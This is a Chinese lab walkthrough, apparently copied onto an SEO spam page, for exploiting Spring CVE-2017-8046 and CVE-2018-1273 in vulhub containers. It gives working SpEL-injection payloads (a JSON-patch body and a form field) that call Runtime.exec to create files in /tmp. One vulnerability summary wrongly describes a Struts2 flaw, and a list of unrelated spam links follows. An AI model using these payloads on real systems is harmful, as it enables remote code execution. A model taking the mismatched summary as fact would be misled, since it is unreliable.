当前位置: 首页 > wzjs >正文

郑州seo关键词推广网站优化外包推荐

郑州seo关键词推广,网站优化外包推荐,网站设计标语,软件开发流程示意图一、CVE-2017-8046-Spring Data Rest 远程命令执行命令 漏洞环境 vulhub靶场 /spring/CVE-2017-8046 漏洞简介 漏洞产⽣于⽹站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使⽤通配符namespace时,可能会导致远程代码执⾏漏洞…

一、CVE-2017-8046-Spring Data Rest 远程命令执行命令

漏洞环境

vulhub靶场 /spring/CVE-2017-8046

漏洞简介

漏洞产⽣于⽹站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使⽤通配符namespace时,可能会导致远程代码执⾏漏洞的发⽣。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使⽤通配符namespace,从⽽导致远程代码执⾏漏洞的发⽣。

第一步:开启靶场,访问漏洞页面

#URL
http://47.103.81.25:8080/customers/1
第二步:在本页面抓包,构造payload

#请求方式
先右键修改请求方式改为POST,再直接将POST改为PATCH#Content-Typ
application/json-patch+json#发送数据
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,101}))/lastname", "value": "vulhub" }]#数据中
new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115} 表示的命令 touch /tmp/success ⾥⾯的数字是ascii码
第三步:在云服务器进入此靶场容器的终端

#命令docker ps查看容器id
77e610fd0066#进入终端
docker exec -it 77e610fd0066 /bin/bash
第四步:打开bp,发送后,返回云服务器切换到/tmp目录,查看文件,成功上传

二、CVE-2018-1273-Spring代码执行漏洞

漏洞简介

Spring Data 是⼀个⽤于简化数据库访问,并⽀持云服务的开源框架,Spring Data Commons 是 Spring Data下所有⼦项⽬共享的基础框架。Spring Data Commons 在 2.0.5 及以前版本中,存在⼀处 SpEL 表达式注⼊漏洞,攻击者可以注⼊恶意 SpEL 表达式以执⾏任意命令。

第一步:访问靶场地址
#URL
http://47.103.81.25:8080/users
第二步:填写注册信息,bp抓包,发送到重放器

第三步:删除提交的内容,构造payload

#构造payload
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/iyu")]=&password=&repeatedPassword=
第四步:在云服务器进入此靶场容器的终端,查看是否成功上传文件

#命令docker ps查看容器id
769e92400e15#进入终端
docker exec -it 769e92400e15 /bin/bash#查看是否成功上传
ls /tmp

                                                                                                                                FROM  IYU_

http://www.dtcms.com/wzjs/495153.html

相关文章:

  • 百度网站收录seo流量增加软件
  • 比价网站开发网页设计与制作教程
  • 盱眙建设局网站商品促销活动策划方案
  • 监管网站建设情况搜狗营销
  • 做美容一般在哪个网站团购比较好手机怎么搭建属于自己的网站
  • 加强网站建设 基本措施深圳靠谱网站建设公司
  • 找工作的网站seo最好的工具
  • ecshop生成网站地图url重复简单的html网页制作
  • 微信群二维码大全网站竞价托管的注意事项
  • 免费网站建设视频北京官网优化公司
  • wordpress支付宝微信福州seo顾问
  • 电子商务网站建设实验心得站群seo技巧
  • 石排网站仿做百度指数查询官网入口
  • sogou网站提交查关键词
  • 静态网站开发实验报告域名查询ip网站
  • 电子商务做网站百度快照功能
  • 代理网站有什么用seo关键词排名软件流量词
  • wordpress 时间线主题推广seo是什么意思
  • 商丘网吧什么时候恢复营业北京百度推广seo
  • 政府网站域名手机seo排名软件
  • 做网站有什么好书籍欧美网站建设
  • 聊城做网站的公司流程哪个合肥seo好
  • 宁夏网站建设一条龙网站推广公司大家好
  • 网站建设合同严瑾爱站之家
  • 物联网平台中心seo优化软件有哪些
  • 唐山正规做网站的公司哪家好互联网营销是干什么
  • 如何做好品牌网站建设网络推广运营途径
  • 模板网站 建设 方法怎样创建网站或者网址
  • 做网站找顺的十大小说网站排名
  • 网站制作价格低关联词有哪些关系